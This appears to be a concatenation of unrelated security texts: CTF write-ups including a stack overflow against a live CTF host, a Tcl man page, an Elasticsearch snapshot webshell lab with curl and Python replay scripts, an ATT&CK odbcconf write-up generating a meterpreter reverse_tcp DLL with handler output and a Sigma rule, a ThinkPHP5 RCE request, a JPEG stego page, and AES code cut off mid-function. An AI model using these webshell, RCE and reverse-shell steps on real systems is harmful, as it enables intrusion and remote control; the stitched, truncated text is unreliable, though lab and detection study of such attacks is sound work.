# Hurry up! Wait!

Category: Reverse Engineering, 100 points

## Description

A binary file was attached.

## Solution

Let's open the file with Ghidra. We can see many function names prefixed with "ada". Most are very short, and one stands out:

```c
void FUN_0010298a(void)
{
  ada__calendar__delays__delay_for(1000000000000000);
  FUN_00102616();
  FUN_001024aa();
  FUN_00102372();
  FUN_001025e2();
  FUN_00102852();
  FUN_00102886();
  FUN_001028ba();
  FUN_00102922();
  FUN_001023a6();
  FUN_00102136();
  FUN_00102206();
  FUN_0010230a();
  FUN_00102206();
  FUN_0010257a();
  FUN_001028ee();
  FUN_0010240e();
  FUN_001026e6();
  FUN_00102782();
  FUN_001028ee();
  FUN_001023da();
  FUN_0010230a();
  FUN_0010233e();
  FUN_0010226e();
  FUN_001022a2();
  FUN_001023da();
  FUN_001021d2();
  FUN_00102956();
  return;
}
```

The first function seems to add a runtime delay for a very long time. Let's check what the next function does:

```c
void FUN_00102616(void)
{
  ada__text_io__put__4(&DAT_00102cd8,&DAT_00102cb8,&DAT_00102cb8,&DAT_00102cd8);
  return;
}
```

There are two different globals referenced here: `DAT_00102cd8` and `DAT_00102cb8`. Each one is referenced twice. What are they?

```assembly
DAT_00102cd8    XREF[3]:  FUN_00102616:0010261f(*), FUN_00102616:0010262d(*),
                          FUN_00102616:00102636(*)
00102cd8  70  ??  70h  p  ; ...

DAT_00102cb8    XREF[84]: FUN_00102102:00102112(*), FUN_00102102:00102125(*),
                          FUN_00102206:00102216(*), FUN_00102206:00102229(*),
                          FUN_0010223a:0010224a(*), FUN_0010223a:0010225d(*),
                          FUN_0010230a:0010231a(*), FUN_0010230a:0010232d(*),
                          FUN_0010233e:0010234e(*), FUN_0010240e:0010241e(*),
                          FUN_0010240e:00102431(*), FUN_00102512:00102522(*),
                          FUN_00102512:00102535(*), FUN_00102616:00102626(*),
                          FUN_00102616:00102639(*), FUN_0010271a:0010272a(*),
                          FUN_0010271a:0010273d(*), FUN_0010281e:0010282e(*),
                          FUN_0010281e:00102841(*), FUN_00102922:00102932(*),
                          [more]
00102cb8  01  ??  01h
00102cb9  00  ??  00h
00102cba  00  ??  00h
00102cbb  00  ??  00h
00102cbc  01  ??  01h
00102cbd  00  ??  00h
00102cbe  00  ??  00h
00102cbf  00  ??  00h
```

So `DAT_00102cd8` is `p`. What about the next function, `FUN_001024aa`?

```c
void FUN_001024aa(void)
{
  ada__text_io__put__4(&DAT_00102cd1,&DAT_00102cb8,&DAT_00102cb8,&DAT_00102cd1);
  return;
}
```

Again, we see the same `DAT_00102cb8` global from the previous function, together with a new global, `DAT_00102cd1`:

```assembly
DAT_00102cd1    XREF[3]:  FUN_001024aa:001024b3(*), FUN_001024aa:001024c1(*),
                          FUN_001024aa:001024ca(*)
00102cd1  69  ??  69h  i
```

So `DAT_00102cd1` is `i`. This should be enough for us to assume that the first (and last) parameter to `ada__text_io__put__4` is a letter from the flag.

We can continue following the functions and taking note of the letter they print, or use the following Ghidra script to do it programmatically:

```python
import sys

def getAddress(offset):
    return currentProgram.getAddressFactory().getDefaultAddressSpace().getAddress(offset)

listing = currentProgram.getListing()
functionManager = currentProgram.getFunctionManager()

main_func = getGlobalFunctions("FUN_0010298a")[0]

# Iterate the instructions that FUN_0010298a() is composed of
for codeUnit in listing.getCodeUnits(main_func.getBody(), True):
    if not codeUnit.toString().startswith("CALL"):
        # Ignore anything that isn't a "call"
        continue
    callee = functionManager.getFunctionAt(getAddress(str(codeUnit.getAddress(0))))
    if not callee.getName().startswith("FUN_"):
        # In practice - skip ada__calendar__delays__delay_for()
        continue
    # Iterate the instructions that the callee is composed of
    for cu in listing.getCodeUnits(callee.getBody(), True):
        if not cu.toString().startswith("LEA RAX"):
            # Ignore anything that isn't LEA RAX, [addr],
            # since that's the instruction that loads the flag character to be printed
            continue
        # Check what's at "addr" and print it
        sys.stdout.write(chr(getByte(getAddress(str(cu.getScalar(1))))))
print("")
```

Output:

```
Hurry_up_wait.py> Running...
picoCTF{d15a5m_ftw_eab78e4}
Hurry_up_wait.py> Finished!
```

The flag: `picoCTF{d15a5m_ftw_eab78e4}`
# Faculta Necshevet Identifier v2

Category: Reversing & Binary Exploitation

## Description

> After the failure of the previous version, DuckyDebugDuck created a new version which he says is "quack-proof", and even hid a new flag in it!

A binary file was attached.

## Solution

Let's run the attached file:

```console
root@kali:/media/sf_CTFs/technion/Faculta_Necshevet_Identifier_v2# ./facultaNecshevetIdentifier
My name is DuckyDebugDuck, what's yours? test
Hi test, checking...
You're not from a faculta necshevet, you won't get the flag
```

Just like in the [previous challenge](Faculta_Necshevet_Identifier.md), we must enter the correct name in order to be identified as worthy of getting the flag. Let's check the decompilation with Ghidra:

```c
undefined8 main(void)
{
  int is_equal;
  char user_input [59];
  char expected_name [5];

  expected_name._0_4_ = 0x45455754;
  expected_name[4] = 'T';
  printf("My name is DuckyDebugDuck, what\'s yours? ");
  __isoc99_scanf(&DAT_00102032,user_input);
  printf("Hi %s, checking...\n",user_input);
  is_equal = strcmp(expected_name,"QUACK");
  if (is_equal == 0) {
    puts("YOU\'RE FROM A FACULTA NECHSEVET, here\'s the flag: ###############");
  }
  else {
    puts("You\'re not from a faculta necshevet, you won\'t get the flag");
  }
  return 0;
}
```

Again, the program does not limit the user input, allowing us to overwrite variables on the stack:

```assembly
DAT_00102032    XREF[1]:  main:001011d8(*)
00102032  25  ??  25h  %
00102033  73  ??  73h  s
00102034  00  ??  00h
```

We need to overwrite `expected_name`, which starts with a value of `TWEET` and needs to be `QUACK` in order for us to read the flag. So what we'll do is send 59 filler characters to fill up `user_input`, followed by `QUACK` to overwrite and re-populate `expected_name`:

```console
root@kali:/media/sf_CTFs/technion/Faculta_Necshevet_Identifier_v2# python -c "print('a'*59 + b'QUACK')" | nc ctf.cs.technion.ac.il 4006
My name is DuckyDebugDuck, what's yours? Hi aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQUACK, checking...
YOU'RE FROM A FACULTA NECHSEVET, here's the flag: cstechnion{qu4ck_0v3rfl0w}
```
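For a scripted variant of the same overflow, here is a minimal pwntools sketch. It assumes the host and port shown in the transcript above are still reachable; adjust them for your own setup.

```python
# Minimal pwntools sketch of the overflow described above.
from pwn import remote

io = remote("ctf.cs.technion.ac.il", 4006)
# 59 filler bytes fill user_input, then "QUACK" overwrites expected_name
io.sendline(b"a" * 59 + b"QUACK")
print(io.recvall().decode())
```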
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1997 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: global.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or modifies arg, '\" and indent is equivalent to second arg of .IP (shouldn't ever be '\" needed; use .AS below instead) '\" '\" .AS ?type? ?name? '\" Give maximum sizes of arguments for setting tab stops. Type and '\" name are examples of largest possible arguments that will be passed '\" to .AP later. If args are omitted, default tab stops are used. '\" '\" .BS '\" Start box enclosure. From here until next .BE, everything will be '\" enclosed in one large box. '\" '\" .BE '\" End of box enclosure. '\" '\" .CS '\" Begin code excerpt. '\" '\" .CE '\" End code excerpt. '\" '\" .VS ?version? ?br? '\" Begin vertical sidebar, for use in marking newly-changed parts '\" of man pages. The first argument is ignored and used for recording '\" the version when the .VS was added, so that the sidebars can be '\" found and removed when they reach a certain age. If another argument '\" is present, then a line break is forced before starting the sidebar. '\" '\" .VE '\" End of vertical sidebar. '\" '\" .DS '\" Begin an indented unfilled display. '\" '\" .DE '\" End of indented unfilled display. '\" '\" .SO '\" Start of list of standard options for a Tk widget. The '\" options follow on successive lines, in four columns separated '\" by tabs. '\" '\" .SE '\" End of list of standard options for a Tk widget. '\" '\" .OP cmdName dbName dbClass '\" Start of description of a specific option. cmdName gives the '\" option's name as specified in the class command, dbName gives '\" the option's name in the option database, and dbClass gives '\" the option's class in the option database. '\" '\" .UL arg1 arg2 '\" Print arg1 underlined, then print arg2 normally. '\" '\" RCS: @(#) $Id: global.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" # Set up traps and other miscellaneous stuff for Tcl/Tk man pages. .if t .wh -1.3i ^B .nr ^l \n(.l .ad b '\" # Start an argument description .de AP .ie !"\\$4"" .TP \\$4 .el \{\ . ie !"\\$2"" .TP \\n()Cu . el .TP 15 .\} .ta \\n()Au \\n()Bu .ie !"\\$3"" \{\ \&\\$1 \\fI\\$2\\fP (\\$3) .\".b .\} .el \{\ .br .ie !"\\$2"" \{\ \&\\$1 \\fI\\$2\\fP .\} .el \{\ \&\\fI\\$1\\fP .\} .\} .. '\" # define tabbing values for .AP .de AS .nr )A 10n .if !"\\$1"" .nr )A \\w'\\$1'u+3n .nr )B \\n()Au+15n .\" .if !"\\$2"" .nr )B \\w'\\$2'u+\\n()Au+3n .nr )C \\n()Bu+\\w'(in/out)'u+2n .. .AS Tcl_Interp Tcl_CreateInterp in/out '\" # BS - start boxed text '\" # ^y = starting y location '\" # ^b = 1 .de BS .br .mk ^y .nr ^b 1u .if n .nf .if n .ti 0 .if n \l'\\n(.lu\(ul' .if n .fi .. '\" # BE - end boxed text (draw box now) .de BE .nf .ti 0 .mk ^t .ie n \l'\\n(^lu\(ul' .el \{\ .\" Draw four-sided box normally, but don't draw top of .\" box if the box started on an earlier page. 
.ie !\\n(^b-1 \{\ \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .el \}\ \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .\} .fi .br .nr ^b 0 .. '\" # VS - start vertical sidebar '\" # ^Y = starting y location '\" # ^v = 1 (for troff; for nroff this doesn't matter) .de VS .if !"\\$2"" .br .mk ^Y .ie n 'mc \s12\(br\s0 .el .nr ^v 1u .. '\" # VE - end of vertical sidebar .de VE .ie n 'mc .el \{\ .ev 2 .nf .ti 0 .mk ^t \h'|\\n(^lu+3n'\L'|\\n(^Yu-1v\(bv'\v'\\n(^tu+1v-\\n(^Yu'\h'-|\\n(^lu+3n' .sp -1 .fi .ev .\} .nr ^v 0 .. '\" # Special macro to handle page bottom: finish off current '\" # box/sidebar if in box/sidebar mode, then invoked standard '\" # page bottom macro. .de ^B .ev 2 'ti 0 'nf .mk ^t .if \\n(^b \{\ .\" Draw three-sided box if this is the box's first page, .\" draw two sides but no top otherwise. .ie !\\n(^b-1 \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .el \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .\} .if \\n(^v \{\ .nr ^x \\n(^tu+1v-\\n(^Yu \kx\h'-\\nxu'\h'|\\n(^lu+3n'\ky\L'-\\n(^xu'\v'\\n(^xu'\h'|0u'\c .\} .bp 'fi .ev .if \\n(^b \{\ .mk ^y .nr ^b 2 .\} .if \\n(^v \{\ .mk ^Y .\} .. '\" # DS - begin display .de DS .RS .nf .sp .. '\" # DE - end display .de DE .fi .RE .sp .. '\" # SO - start of list of standard options .de SO .SH "STANDARD OPTIONS" .LP .nf .ta 5.5c 11c .ft B .. '\" # SE - end of list of standard options .de SE .fi .ft R .LP See the \\fBoptions\\fR manual entry for details on the standard options. .. '\" # OP - start of full description for a single option .de OP .LP .nf .ta 4c Command-Line Name: \\fB\\$1\\fR Database Name: \\fB\\$2\\fR Database Class: \\fB\\$3\\fR .fi .IP .. '\" # CS - begin code excerpt .de CS .RS .nf .ta .25i .5i .75i 1i .. '\" # CE - end code excerpt .de CE .fi .RE .. .de UL \\$1\l'|0\(ul'\\$2 .. .TH global 3tcl "" Tcl "Tcl Built-In Commands" .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME global \- 访问全局变量 .SH "总览 SYNOPSIS" \fBglobal \fIvarname \fR?\fIvarname ...\fR? .BE .SH "描述 DESCRIPTION" .PP 除非正在解释一个 Tcl 过程否则忽略这个命令。如果正在解释一个 Tcl 过程,则它声明这些给定的 \fIvarname\fR 是全局变量而不是局部变量。全局变量是在全局名字空间中的变量。在这个当前过程的持续期间(duration)(并且只有在当前过程中执行的时候),对 \fIvarname\fR 中任何一个的任何引用都将参照(refer to)叫相同名字的全局变量。 .PP Please note that this is done by creating local variables that are linked to the global variables, and therefore that these variables will be listed by \fBinfo locals\fR like all other local variables. .SH "参见 SEE ALSO" namespace(n), upvar(n), variable(n) .SH "关键字 KEYWORDS" global, namespace, procedure, variable .SH "[中文版维护人]" .B 寒蝉退士 .SH "[中文版最新更新]" .B 2001/09/02 .SH "《中国 Linux 论坛 man 手册页翻译计划》:" .BI http://cmpp.linuxforum.net
# Elasticsearch Webshell Write Vulnerability (WooYun-2015-110216)

Reference:

http://cb.drops.wiki/bugs/wooyun-2015-0110216.html

## Principle

ElasticSearch has a data backup (snapshot) feature: the user supplies a path and ElasticSearch writes its backup data under that path, with the file name and extension both under the user's control.

So if other services such as Tomcat or PHP run on the same filesystem, we can abuse ElasticSearch's backup feature to write a webshell.

Like CVE-2015-5531, this vulnerability involves backup repositories. Since ElasticSearch 1.5.1, the repository root is restricted to the `path.repo` option in the configuration file, and if the administrator does not configure this option, the feature is disabled by default. Even when it is configured, a webshell cannot be written unless the web root lies inside that directory. The affected ElasticSearch versions are therefore those before 1.5.x.

## Test environment

Build and start the test environment:

```
docker compose build
docker compose up -d
```

A quick overview of this environment: it runs Tomcat and ElasticSearch side by side. Tomcat lives in `/usr/local/tomcat` with the web root at `/usr/local/tomcat/webapps`; ElasticSearch lives in `/usr/share/elasticsearch`.

Our goal is to use ElasticSearch to write a webshell into the `/usr/local/tomcat/webapps` directory.

## Test procedure

First, create a malicious indexed document:

```
curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'
```

Then create a malicious repository, where the value of `location` is the path we want to write to.

> 园长 (Yuanzhang): The repository path is interesting, because it can point anywhere the process can reach, and if the path does not exist it is created automatically. That means you can create arbitrary directories through the file access protocol. Here I pointed it at Tomcat's web deployment directory, because creating a directory there makes Tomcat automatically deploy a new application (a folder named wwwroot becomes an application named wwwroot).

```
curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{
     "type": "fs",
     "settings": {
          "location": "/usr/local/tomcat/webapps/wwwroot/",
          "compress": false
     }
}'
```

Verify and create the snapshot:

```
curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{
     "indices": "yz.jsp",
     "ignore_unavailable": "true",
     "include_global_state": false
}'
```

Done! Visit `http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp`: this is the webshell we just wrote.

This shell writes an arbitrary string into the file test.jsp under wwwroot. For example, after requesting `http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success`, visiting /wwwroot/test.jsp shows success:

![](1.png)
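The three curl requests above can also be replayed in one go. Below is a minimal Python sketch that does just that; the target URL and the Tomcat path are the ones from this lab environment, so treat them as placeholders for your own setup.

```python
# Sketch: replay the three steps of the snapshot webshell write via requests.
import requests

ES = "http://127.0.0.1:9200"  # ElasticSearch endpoint from the lab above

# 1. Index a document whose key is the JSP payload
doc = {('<%new java.io.RandomAccessFile(application.getRealPath(new String('
        'new byte[]{47,116,101,115,116,46,106,115,112})),new String(new '
        'byte[]{114,119})).write(request.getParameter(new String(new '
        'byte[]{102})).getBytes());%>'): "test"}
requests.post(f"{ES}/yz.jsp/yz.jsp/1", json=doc)

# 2. Create a repository pointing at Tomcat's webapps directory
repo = {"type": "fs",
        "settings": {"location": "/usr/local/tomcat/webapps/wwwroot/",
                     "compress": False}}
requests.put(f"{ES}/_snapshot/yz.jsp", json=repo)

# 3. Trigger the snapshot, which writes the files to disk
snap = {"indices": "yz.jsp", "ignore_unavailable": "true",
        "include_global_state": False}
requests.put(f"{ES}/_snapshot/yz.jsp/yz.jsp", json=snap)

print("shell: http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp")
```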
ftpcount
===

Show the number of users currently logged in over FTP

## Description

Displays the number of users currently logged in over FTP. Running this command tells you how many users are logged into the system via FTP, as well as the FTP login limit.

Syntax:

```shell
ftpcount
```
version: '2'
services:
  struts2:
    image: vulhub/struts2:2.3.34-showcase
    volumes:
      - ./struts-actionchaining.xml:/usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts-actionchaining.xml
    ports:
      - "8080:8080"
# T1218-008-win - Executing a Payload via the Whitelisted Binary Odbcconf.exe

## Description from ATT&CK

Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft-signed binaries installed by default on Windows can be used to proxy the execution of other files. Adversaries may abuse this to execute malicious files that bypass application whitelisting and signature validation. This technique covers proxy execution methods not already accounted for by existing techniques.

## Test case

Odbcconf.exe is a Windows utility that configures Open Database Connectivity (ODBC) drivers and data source names. Attackers may abuse it to execute DLLs, much like Regsvr32 with its REGSVR option.

odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}

Note: the directory containing Odbcconf.exe is already in the system PATH environment variable, so the command resolves directly; mind which of the x86 and x64 copies of Odbcconf you invoke.

Default locations on Windows 2003:

```dos
C:\WINDOWS\system32\odbcconf.exe
C:\WINDOWS\SysWOW64\odbcconf.exe
```

Default locations on Windows 7:

```dos
C:\Windows\System32\odbcconf.exe
C:\Windows\SysWOW64\odbcconf.exe
```

Additional note: on newer Windows versions you can record process command-line arguments by policy: `Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation > Include command line in process creation events > Enabled`. Alternatively, deploy Sysmon and monitor through Sysmon logs.

## Detection logs

Windows Security log (requires configuration)

## Reproduction

### Environment

Attacker: Kali 2019

Victim: Windows 7

### Attack analysis

#### Generate payload.dll

```bash
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.126.146 LPORT=53 -f dll -o payload.dll
```

#### Start the listener

On the attacker, note the `set AutoRunScript migrate -f` setting (AutoRunScript is a powerful post-exploitation automation hook in msf; the migrate option moves the payload into another process):

```bash
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.126.146
lhost => 192.168.126.146
msf5 exploit(multi/handler) > set lport 53
lport => 53
msf5 exploit(multi/handler) > set AutoRunScript migrate -f
AutoRunScript => migrate -f
msf5 exploit(multi/handler) > exploit
```

#### Run the payload on the victim

```cmd
C:\Windows\SysWOW64\odbcconf.exe /a {regsvr C:\payload.dll}
```

#### Reverse shell

```bash
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.126.146:53
[*] Sending stage (180291 bytes) to 192.168.126.149
[*] Meterpreter session 2 opened (192.168.126.146:53 -> 192.168.126.149:49306) at 2020-04-18 20:45:29 +0800
[*] Session ID 2 (192.168.126.146:53 -> 192.168.126.149:49306) processing AutoRunScript 'migrate -f'
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Current server process: rundll32.exe (912)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3820
[+] Successfully migrated to process
meterpreter > getuid
Server username: 12306Br0-PC\12306Br0
```

## Artifacts left behind

```log
Windows Security log

Event ID: 4688
Process Information:
    New Process ID: 0xfec
    New Process Name: C:\Windows\SysWOW64\odbcconf.exe

Event ID: 4688
Process Information:
    New Process ID: 0x390
    New Process Name: C:\Windows\SysWOW64\rundll32.exe

Sysmon log

Event ID: 1
Image: C:\Windows\SysWOW64\odbcconf.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: ODBC Driver Configuration Program
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: odbcconf.exe
CommandLine: C:\Windows\SysWOW64\odbcconf.exe /a {regsvr C:\payload.dll}
CurrentDirectory: C:\
User: 12306Br0-PC\12306Br0
LogonGuid: {bb1f7c32-5fc3-5e99-0000-00201ae20600}
LogonId: 0x6e21a
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=B1C49B2159C237B1F2BCE2D40508113E39143F7B
ParentProcessGuid: {bb1f7c32-f65d-5e9a-0000-0010833eef00}
ParentProcessId: 3868
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\Windows\system32\cmd.exe"

Event ID: 1
Image: C:\Windows\SysWOW64\rundll32.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: Windows host process (Rundll32)
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: RUNDLL32.EXE
CommandLine: rundll32.exe
CurrentDirectory: C:\
User: 12306Br0-PC\12306Br0
LogonGuid: {bb1f7c32-5fc3-5e99-0000-00201ae20600}
LogonId: 0x6e21a
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=8939CF35447B22DD2C6E6F443446ACC1BF986D58
ParentProcessGuid: {bb1f7c32-f662-5e9a-0000-0010d648ef00}
ParentProcessId: 4076
ParentImage: C:\Windows\SysWOW64\odbcconf.exe
ParentCommandLine: C:\Windows\SysWOW64\odbcconf.exe /a {regsvr C:\payload.dll}
```

## Detection rules / ideas

### Sigma rule

```yml
title: Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
description: Detects defence evasion attempt via odbcconf.exe execution to load DLL
status: experimental
references:
    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Odbcconf.yml
    - https://twitter.com/Hexacorn/status/1187143326673330176
author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community
date: 2019/10/25
modified: 2019/11/07
tags:
    - attack.defense_evasion
    - attack.execution
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_1:
        Image|endswith: '\odbcconf.exe'
        CommandLine|contains:
            - '-f'
            - '/a'
            - 'regsvr'
    selection_2:
        ParentImage|endswith: '\odbcconf.exe'
        Image|endswith: '\rundll32.exe'
    condition: selection_1 or selection_2
level: medium
falsepositives:
    - Legitimate use of odbcconf.exe by legitimate user
```

### Recommendations

There is no dedicated detection rule beyond monitoring process creation events 4688/1 (process name, command line). This monitoring approach requires configuring the audit policy or installing Sysmon yourself.

## References

MITRE-ATT&CK-T1218-008 <https://attack.mitre.org/techniques/T1218/008/>

Whitelist-based techniques for getting a shell on Windows, part 2 <http://www.safe6.cn/article/157#directory030494471069429444>
# JPG

## File structure

- JPEG is a lossy compression format: saving pixel data as JPEG and reading it back changes some pixel values slightly. A quality parameter between 0 and 100 controls the trade-off: the higher the value, the more faithful and the larger the image. 70 or 80 is usually enough.
- JPEG carries no transparency information.

The basic data structures of a JPG file are of two kinds: "segments" and the entropy-coded image data.

| Name | Bytes | Data | Notes |
| --- | --- | --- | --- |
| Segment marker | 1 | FF | Marks the start of each new segment |
| Segment type | 1 | | Type code (the "marker code") |
| Segment length | 2 | | Includes the segment content and the length field itself, but not the marker or type bytes |
| Segment content | ≤65533 | | Variable length |

- Some segments have no length field and no content, only the marker and the type byte; the file header and trailer are segments of this kind.
- Any number of `FF` bytes between segments is legal; these "fill bytes" must be ignored.

Some common segment types: `0xffd8` and `0xffd9` mark the start and end of a JPG file. (A short Python sketch that walks this segment layout appears at the end of this page.)

## Steganography tools

### [Stegdetect](https://github.com/redNixon/stegdetect)

A steganalysis tool that statistically evaluates the DCT coefficients of JPEG files. It can detect information hidden with tools such as JSteg, JPHide, OutGuess, Invisible Secrets, F5, appendX and Camouflage, and it can also dictionary-brute-force the passwords of data embedded with jphide, outguess and jsteg-shell.

```shell
-q  Only report images that are likely to contain hidden content.
-n  Enable checking of the JPEG file header to reduce false positives. When enabled,
    all files with comment sections are treated as having no embedded data, and
    OutGuess detection is disabled if the JFIF version number is not 1.1.
-s  Adjust the sensitivity of the detection algorithm (default 1). The match score
    scales with the sensitivity: the higher the value, the more likely a flagged
    file really contains hidden data.
-d  Print debug information with line numbers.
-t  Select which embedding tools to test for (default jopi):
    j  Test whether the image was embedded with jsteg.
    o  Test whether the image was embedded with outguess.
    p  Test whether the image was embedded with jphide.
    i  Test whether the image was embedded with invisible secrets.
```

### [JPHS](http://linux01.gwdg.de/~alatham/stego.html)

JPHS, developed by Allan Latham, hides information in lossy JPEG files on Windows and Linux. It contains two main programs: JPHIDE, which encrypts a data file and embeds it into a JPEG image, and JPSEEK, which detects and extracts files hidden with JPHIDE. The Windows build's JPHSWIN program offers a graphical interface with both JPHIDE and JPSEEK functionality.

### [SilentEye](http://silenteye.v1kings.io/)

> SilentEye is a cross-platform application design for an easy use of steganography, in this case hiding messages into pictures or sounds. It provides a pretty nice interface and an easy integration of new steganography algorithm and cryptography process by using a plug-ins system.
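To make the segment layout above concrete, here is a minimal Python sketch that walks a JPEG's segments and prints their types and lengths. It stops at SOS, where the entropy-coded scan data begins.

```python
# Sketch: walk JPEG segments (FF marker, type byte, big-endian 2-byte
# length that includes itself) as described in the table above.
import struct, sys

def walk_segments(path):
    data = open(path, "rb").read()
    assert data[:2] == b"\xff\xd8", "not a JPEG (missing SOI)"
    i = 2
    while i < len(data):
        while data[i] == 0xFF:      # skip the marker byte and any fill bytes
            i += 1
        marker = data[i]; i += 1
        if marker == 0xD9:          # EOI: end of image
            print("ffd9 EOI"); break
        if 0xD0 <= marker <= 0xD7:  # RSTn markers carry no length field
            continue
        if marker == 0xDA:          # SOS: entropy-coded data follows
            print("ffda SOS (scan data follows)"); break
        (length,) = struct.unpack(">H", data[i:i + 2])
        print(f"ff{marker:02x} length={length}")
        i += length                 # the length includes its own 2 bytes

walk_segments(sys.argv[1])
```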
# ThinkPHP5 5.0.22/5.1.29 Remote Code Execution Vulnerability

ThinkPHP is a very widely used PHP development framework. In version 5, the controller name is not handled correctly, so when the site does not enable forced routing (the default configuration) arbitrary methods can be invoked, leading to remote code execution.

References:

- http://www.thinkphp.cn/topic/60400.html
- http://www.thinkphp.cn/topic/60390.html
- https://xz.aliyun.com/t/3570

## Vulnerable environment

Run ThinkPHP version 5.0.20:

```
docker compose up -d
```

Once the environment is up, visit `http://your-ip:8080` to see the default ThinkPHP start page.

## Exploitation

Simply visit `http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1` to execute phpinfo:

![](1.png)
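The same request can be scripted. Below is a minimal sketch using Python requests; `target` is a placeholder for your lab instance, and swapping `phpinfo`/`-1` for `system` and a command string is the usual next step.

```python
# Sketch: trigger the ThinkPHP5 invokefunction gadget described above.
import requests

target = "http://your-ip:8080"  # placeholder for the vulnerable instance
params = {
    "s": r"/Index/\think\app/invokefunction",
    "function": "call_user_func_array",
    "vars[0]": "phpinfo",
    "vars[1][]": "-1",
}
r = requests.get(f"{target}/index.php", params=params)
print("vulnerable" if "PHP Version" in r.text else "no phpinfo in response")
```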
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# ---------------------------------------------------
# Copyright (c) 2013 Pablo Caro. All Rights Reserved.
# Pablo Caro <me@pcaro.es> - http://pcaro.es/
# AES.py
# ---------------------------------------------------

import sys
import os.path

from AES_base import sbox, isbox, gfp2, gfp3, gfp9, gfp11, gfp13, gfp14, Rcon

if sys.version_info[0] == 3:
    raw_input = input


def RotWord(word):
    # Rotate a 4-byte word left by one byte (used in key expansion)
    return word[1:] + word[0:1]


def SubWord(word):
    # Apply the S-box to each byte of a word (used in key expansion)
    return [sbox[byte] for byte in word]


def SubBytes(state):
    return [[sbox[byte] for byte in word] for word in state]


def InvSubBytes(state):
    return [[isbox[byte] for byte in word] for word in state]


def ShiftRows(state):
    Nb = len(state)
    n = [word[:] for word in state]
    for i in range(Nb):
        for j in range(4):
            n[i][j] = state[(i+j) % Nb][j]
    return n


def InvShiftRows(state):
    Nb = len(state)
    n = [word[:] for word in state]
    for i in range(Nb):
        for j in range(4):
            n[i][j] = state[(i-j) % Nb][j]
    return n


def MixColumns(state):
    # Multiply each column by the fixed MDS matrix over GF(2^8),
    # using the precomputed gfp2/gfp3 multiplication tables
    Nb = len(state)
    n = [word[:] for word in state]
    for i in range(Nb):
        n[i][0] = (gfp2[state[i][0]] ^ gfp3[state[i][1]] ^
                   state[i][2] ^ state[i][3])
        n[i][1] = (state[i][0] ^ gfp2[state[i][1]] ^
                   gfp3[state[i][2]] ^ state[i][3])
        n[i][2] = (state[i][0] ^ state[i][1] ^
                   gfp2[state[i][2]] ^ gfp3[state[i][3]])
        n[i][3] = (gfp3[state[i][0]] ^ state[i][1] ^
                   state[i][2] ^ gfp2[state[i][3]])
    return n


def InvMixColumns(state):
    Nb = len(state)
    n = [word[:] for word in state]
    for i in range(Nb):
        n[i][0] = (gfp14[state[i][0]] ^ gfp11[state[i][1]] ^
                   gfp13[state[i][2]] ^ gfp9[state[i][3]])
        n[i][1] = (gfp9[state[i][0]] ^ gfp14[state[i][1]] ^
                   gfp11[state[i][2]] ^ gfp13[state[i][3]])
        n[i][2] = (gfp13[state[i][0]] ^ gfp9[state[i][1]] ^
